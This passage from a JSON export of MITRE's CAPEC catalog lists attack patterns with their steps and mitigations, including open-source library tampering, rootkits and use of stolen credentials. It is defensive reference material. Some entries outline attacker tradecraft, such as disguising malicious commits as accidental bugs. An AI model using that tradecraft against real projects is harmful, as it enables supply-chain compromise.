desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)",{"Level":"High"}]},"Example_Instances":{"Example":"The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for hardware and/or firmware design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent hardware development system from the manufacturer\'s workstation. The attacker is then able to exfiltrate and alter sensitive data on the hardware system, allowing for future compromise once the developed system is deployed at the victim location."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}]}},"538":{"ID":"538","Name":"Open-Source Library Manipulation","Abstraction":"Detailed","Status":"Stable","Description":"Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":["[Determine the relevant open-source code project to target] The adversary will make the selection based on various criteria:",{"div":{"style":"margin-left:10px;","ul":{"li":["The open-source code currently in use on a selected target system.","The depth in the dependency graph of the open source code in relationship to other code bases in use on the target system. Choosing an OSS lower in the graph decreases the probability of discovery, but also decreases the scope of its use within the target system.","The programming language in which the open source code is implemented. Different languages present different opportunities for using known software weaknesses.","The quality of processes in place to make a contribution. For instance, some contribution sites use static and dynamic analysis tools, which could increase the probability of discovery.","The security requirements necessary to make a contribution. For instance, is the ownership lax allowing unsigned commits or anonymous users."]}}}]},{"Step":"2","Phase":"Experiment","Description":["[Develop a plan for malicious contribution] The adversary develops a plan to contribute malicious code, taking the following into consideration:",{"div":{"style":"margin-left:10px;","ul":{"li":["The adversary will probably avoid easy-to-find software weaknesses, especially ones that static and dynamic analysis tools are likely to discover.","Common coding errors or missing edge cases of the algorithm, which can be explained away as being accidental, if discovered, will be preferred by the adversary.","Sometimes no identity is required to make a contribution. Other options are to steal an existing identity or create one. When creating a new identity, strike a balance between too little or too much detail. Using an stolen identity could cause a notification to be sent to the actual user."]}}}]},{"Step":"3","Phase":"Exploit","Description":"[Execute the plan for malicious contribution] Write the code to be contributed based on the plan and then submit the contribution. Multiple commits, possibly using multiple identities, will help obscure the attack. Monitor the contribution site to try to determine if the code has been uploaded to the target system."}]},"Prerequisites":{"Prerequisite":"Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location."},"Skills_Required":{"Skill":["Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration.",{"Level":"High"}]},"Example_Instances":{"Example":"An adversary with access to an open source code project introduces a hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The adversary commits the change to the code which is picked up by a manufacturer who develops VPN software. It is eventually deployed at the victim\'s location where the very specific conditions are met giving the adversary the ability to sniff plaintext traffic thought to be encrypted. This can provide to the adversary access to sensitive data of the victim."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated @Name, Description, Example_Instances, Execution_Flow, Related_Attack_Patterns"}],"Previous_Entry_Name":["Open Source Libraries Altered",{"Date":"2021-06-24"}]}},"539":{"ID":"539","Name":"ASIC With Malicious Functionality","Abstraction":"Detailed","Status":"Draft","Description":"An attacker with access to the development environment process of an application-specific integrated circuit (ASIC) for a victim system being developed or maintained after initial deployment can insert malicious functionality into the system for the purpose of disruption or further compromise.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":["The attacker must have working knowledge of some if not all of the components involved in the target system as well as the infrastructure and development environment of the manufacturer.","Advanced knowledge about the ASIC installed within the target system."]},"Skills_Required":{"Skill":["Able to develop and manufacture malicious subroutines for an ASIC environment without degradation of existing functions and processes.",{"Level":"High"}]},"Example_Instances":{"Example":"A hardware manufacturer periodically updates its ASIC with new features. The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for ASIC design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent ASIC development system. The attacker is then able to exfiltrate and alter sensitive data on the ASIC system, allowing for future compromise once a new AISC is deployed at the victim location."},"References":{"Reference":{"External_Reference_ID":"REF-439"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"540":{"ID":"540","Name":"Overread Buffers","Abstraction":"Standard","Status":"Draft","Description":"An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"123"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overread on. Adversaries often look for applications that accept user input and that perform manual memory management."},{"Step":"2","Phase":"Experiment","Description":"[Find attack vector] The adversary identifies an attack vector by looking for areas in the application where they can specify to read more data than is required."},{"Step":"3","Phase":"Exploit","Description":"[Overread the buffer] The adversary provides input to the application that gets it to read past the bounds of a buffer, possibly revealing sensitive information that was not intended to be given to the adversary."}]},"Prerequisites":{"Prerequisite":"For this type of attack to be successful, a few prerequisites must be met. First, the targeted software must be written in a language that enables fine grained buffer control. (e.g., c, c++) Second, the targeted software must actually perform buffer operations and inadequately perform bounds-checking on those buffer operations. Finally, the adversary must have the capability to influence the input that guides these buffer operations."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"By reading outside the boundary of the intended buffer, the adversary is potentially able to see any data that is stored on the disk. This could include secret keys, personal information, and sensitive files."},{"Scope":"Availability","Impact":"Unreliable Execution","Note":"Depending on the use of the target buffer, an application or system crash can be achieved."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"125"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"541":{"ID":"541","Name":"Application Fingerprinting","Abstraction":"Standard","Status":"Draft","Description":"An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"224"}},"Prerequisites":{"Prerequisite":"None"},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"542":{"ID":"542","Name":"Targeted Malware","Abstraction":"Standard","Status":"Draft","Description":"An adversary develops targeted malware that takes advantage of a known vulnerability in an organizational information technology environment. The malware crafted for these attacks is based specifically on information gathered about the technology environment. Successfully executing the malware enables an adversary to achieve a wide variety of negative technical impacts.","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"549"},{"Nature":"CanPrecede","CAPEC_ID":"662"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"543":{"ID":"543","Name":"Counterfeit Websites","Abstraction":"Detailed","Status":"Draft","Description":"Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"CanPrecede","CAPEC_ID":"89"}]},"Prerequisites":{"Prerequisite":"None"},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"544":{"ID":"544","Name":"Counterfeit Organizations","Abstraction":"Detailed","Status":"Draft","Description":"An adversary creates a false front organizations with the appearance of a legitimate supplier in the critical life cycle path that then injects corrupted/malicious information system components into the organizational supply chain.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":"None"},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"545":{"ID":"545","Name":"Pull Data from System Resources","Abstraction":"Standard","Status":"Draft","Description":"An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"116","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"437"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1239"},{"CWE_ID":"1243"},{"CWE_ID":"1258"},{"CWE_ID":"1266"},{"CWE_ID":"1272"},{"CWE_ID":"1278"},{"CWE_ID":"1323"},{"CWE_ID":"1324"},{"CWE_ID":"1258"},{"CWE_ID":"1330"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1555.001","Entry_Name":"Credentials from Password Stores:Keychain"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1005","Entry_Name":"Data from Local System"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}],"Previous_Entry_Name":["Probe Application Queries",{"Date":"2015-11-09"}]}},"546":{"ID":"546","Name":"Incomplete Data Deletion in a Multi-Tenant Environment","Abstraction":"Detailed","Status":"Draft","Description":"An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants\' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"545"}},"Prerequisites":{"Prerequisite":"The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system."},"Skills_Required":{"Skill":["The adversary requires the ability to traverse directory structure.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"A successful attack that probes application memory will compromise the confidentiality of that data."}},"Mitigations":{"Mitigation":["Cloud providers should completely delete data to render it irrecoverable and inaccessible from any layer and component of infrastructure resources.","Deletion of data should be completed promptly when requested."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"284"},{"CWE_ID":"1266"},{"CWE_ID":"1272"}]},"References":{"Reference":{"External_Reference_ID":"REF-461"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Name"}],"Previous_Entry_Name":["Probe Application Memory",{"Date":"2021-10-21"}]}},"547":{"ID":"547","Name":"Physical Destruction of Device or Component","Abstraction":"Standard","Status":"Draft","Description":"An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"607","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"},{"Exclude_ID":"403"}]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"548":{"ID":"548","Name":"Contaminate Resource","Abstraction":"Meta","Status":"Draft","Description":"An adversary contaminates organizational information systems (including devices and networks) by causing them to handle information of a classification/sensitivity for which they have not been authorized. The information is exposed to individuals who are not authorized access to such information, and the information system, device, or network is unavailable while the spill is investigated and mitigated.","Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"549":{"ID":"549","Name":"Local Execution of Code","Abstraction":"Meta","Status":"Stable","Description":"An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Prerequisites":{"Prerequisite":"Knowledge of the target system\'s vulnerabilities that can be capitalized on with malicious code.The adversary must be able to place the malicious code on the target system."},"Resources_Required":{"Resource":"The means by which the adversary intends to place the malicious code on the system dictates the tools required. For example, suppose the adversary wishes to leverage social engineering and convince a legitimate user to open a malicious file attached to a seemingly legitimate email. In this case, the adversary might require a tool capable of wrapping malicious code into an innocuous filetype (e.g., PDF, .doc, etc.)"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely."}]},"Mitigations":{"Mitigation":["Employ robust cybersecurity training for all employees.","Implement system antivirus software that scans all attachments before opening them.","Regularly patch all software.","Execute all suspicious files in a sandbox environment."]},"Example_Instances":{"Example":"BlueBorne refers to a set of nine vulnerabilities on different platforms (Linux, Windows, Android, iOS) that offer an adversary the ability to install and execute malicious code on a system if they were close in proximity to a Bluetooth enabled device. One vulnerability affecting iOS versions 7 through 9 allowed an attacker to overflow the Low Energy Audio Protocol since commands sent over this protocol are improperly validated and gain the elevated permissions of the Bluetooth stack. These vulnerabilities were a result of poor validation and were patched shortly after their exposure in 2017, but many non-updated devices remain vulnerable."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Methods_of_Attack, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances"}]}},"550":{"ID":"550","Name":"Install New Service","Abstraction":"Detailed","Status":"Draft","Description":"When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Limit privileges of user accounts so new service creation can only be performed by authorized administrators."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.002","Entry_Name":"Create or Modify System Process:Systemd Service"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.003","Entry_Name":"Create or Modify System Process:Windows Service"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.004","Entry_Name":"Create or Modify System Process:Launch Daemon"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"551":{"ID":"551","Name":"Modify Existing Service","Abstraction":"Detailed","Status":"Draft","Description":"When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Limit privileges of user accounts so service changes can only be performed by authorized administrators. Also monitor any service changes that may occur inadvertently."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"284"},{"CWE_ID":"522"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.002","Entry_Name":"Create or Modify System Process:Systemd Service"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.003","Entry_Name":"Create or Modify System Process:Windows Service"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.004","Entry_Name":"Create or Modify System Process:Launch Daemon"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"552":{"ID":"552","Name":"Install Rootkit ","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Prevent adversary access to privileged accounts necessary to install rootkits."},"Example_Instances":{"Example":["A rootkit may take the form of a hypervisor. A hypervisor is a software layer that sits between the operating system and the processor. It presents a virtual running environment to the operating system. An example of a common hypervisor is Xen. Because a hypervisor operates at a level below the operating system it can hide its existence from the operating system.","Similar to a rootkit, a bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1014","Entry_Name":"Rootkit"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1542.003","Entry_Name":"Pre-OS Boot:Bootkit"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1547.006","Entry_Name":"Boot or Logon Autostart Execution:Kernel Modules and Extensions"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"554":{"ID":"554","Name":"Functionality Bypass","Abstraction":"Meta","Status":"Draft","Description":"An adversary attacks a system by bypassing some or all functionality intended to protect it. Often, a system user will think that protection is in place, but the functionality behind those protections has been disabled by the adversary.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"424"},{"CWE_ID":"1299"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-12-07"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"555":{"ID":"555","Name":"Remote Services with Stolen Credentials","Abstraction":"Standard","Status":"Stable","Description":"This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"560","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Mitigations":{"Mitigation":"Disable RDP, telnet, SSH and enable firewall rules to block such traffic. Limit users and accounts that have remote interactive login access. Remove the Local Administrators group from the list of groups allowed to login through RDP. Limit remote user permissions. Use remote desktop gateways and multifactor authentication for remote logins."},"Example_Instances":{"Example":["Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.","Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"294"},{"CWE_ID":"263"},{"CWE_ID":"262"},{"CWE_ID":"521"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1114.002","Entry_Name":"Email Collection:Remote Email Collection"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1021","Entry_Name":"Remote Services"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1133","Entry_Name":"External Remote Services"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, References, Related_Weaknesses, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"}]}},"556":{"ID":"556","Name":"Replace File Extension Handlers","Abstraction":"Detailed","Status":"Draft","Description":"When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file 